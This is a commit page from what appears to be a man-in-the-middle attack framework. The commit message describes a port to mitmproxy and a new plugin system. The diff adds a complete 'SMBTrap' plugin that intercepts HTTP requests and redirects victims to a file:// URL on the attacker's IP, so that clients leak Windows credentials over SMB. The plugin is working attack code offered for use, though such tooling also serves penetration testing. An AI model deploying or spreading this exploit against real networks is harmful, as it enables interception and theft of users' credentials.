Initial commit for v1.0 using mitmproxy instead of twisted

Added a plugin system to Net-Creds so you can now add your own parsers, api hook names might change between now and the offcial release (will submit a PR to the original repo once completed) The main MITM HTTP Proxy now uses mitmproxy which is a big deal, cuts the code down by an insane amount, no more twisted! yay! Basic plugin have been re-wrote for the new proxy engine Since we are using mitmproxy we have out of the box support for SSL/TLS!
2025-07-07 21:42:17 -07:00 · 2016-02-06 13:27:08 -07:00 · 2016-02-06 13:27:08 -07:00 · eea5f53be2
commit eea5f53be2
50 changed files with 5525 additions and 0 deletions
--- a/plugins/smbtrap.py
+++ b/plugins/smbtrap.py
@ -0,0 +1,21 @@
+import random
+import string
+from libmproxy.protocol.http import HTTPResponse
+from plugins.plugin import Plugin
+from netlib.odict import ODictCaseless
+
+class SMBTrap(Plugin):
+    name = 'SMBTrap'
+    optname = 'smbtrap'
+    desc = "Exploits the SMBTrap vulnerability on connected clients"
+    version = "1.0"
+
+    def request(self, context, flow):
+        rand_name = ''.join(random.sample(string.ascii_lowercase + string.ascii_uppercase, 10))
+        resp = HTTPResponse(
+            [1, 1], 302, "OK",
+            ODictCaseless([["Location", "file://{}/{}".format(context.ip, rand_name)]]),
+            "Trapped!")
+
+        context.log("[SMBTrap] Trapped request to: {}".format(flow.request.host))
+        flow.reply(resp)